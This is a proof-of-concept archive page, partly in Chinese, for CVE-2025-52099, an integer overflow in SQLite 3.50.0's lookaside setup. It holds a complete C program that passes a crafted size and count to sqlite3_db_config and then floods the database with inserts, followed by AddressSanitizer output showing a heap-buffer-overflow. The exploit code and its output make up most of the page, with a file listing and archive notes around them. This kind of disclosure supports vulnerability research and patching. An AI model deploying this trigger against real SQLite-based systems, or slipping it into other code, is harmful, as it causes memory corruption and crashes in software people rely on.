关联漏洞
描述
an integer overflow in SQLite 3.50.0
介绍
# CVE-2025-52099
an integer overflow in SQLite 3.50.0
A proof-of-concept (PoC) to trigger an integer overflow in SQLite 3.50.0's `setupLookaside` function is provided below. This overflow occurs due to unchecked multiplication of `sz * nBig`, which can wrap into a negative value and result in invalid memory writes.
Tested on: Ubuntu 22.04 x86_64 with SQLite 3.50.0 (custom built)
PoC code (C):
#include <stdio.h>
#include <sqlite3.h>
int main() {
sqlite3 *db;
// Open SQLite database
if (sqlite3_open("test.db", &db)) {
fprintf(stderr, "Can't open database: %s\n", sqlite3_errmsg(db));
return 1;
}
// Malicious lookaside configuration
// sz = 140, cnt = 1979733333
// This causes internal sz * nBig to overflow and produces negative nSm
int rc = sqlite3_db_config(db, SQLITE_DBCONFIG_LOOKASIDE, NULL, 140, 1979733333);
if (rc != SQLITE_OK) {
fprintf(stderr, "Failed to configure lookaside: %d\n", rc);
return 2;
} else {
printf("[+] Lookaside configured\n");
}
// Create table and perform many inserts to exercise corrupted lookaside pool
sqlite3_exec(db, "CREATE TABLE test(id INTEGER);", NULL, NULL, NULL);
for (int i = 0; i < 100000; i++) {
char sql[64];
snprintf(sql, sizeof(sql), "INSERT INTO test(id) VALUES(%d);", i);
sqlite3_exec(db, sql, NULL, NULL, NULL);
}
printf("[+] Insert finished. Closing DB.\n");
sqlite3_close(db);
return 0;
}
This PoC, when compiled with AddressSanitizer (`-fsanitize=address`), results in a heap-buffer-overflow due to an invalid lookaside slot configuration.
Observed output with ASAN:
==12345==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000f000 ...
READ of size 8 at 0x60200000f000 thread T0
...
文件快照
[4.0K] /data/pocs/598421544a6a9b0bfa417f6eab7ae0ec15b870af
├── [ 764] exploit.c
└── [1.8K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。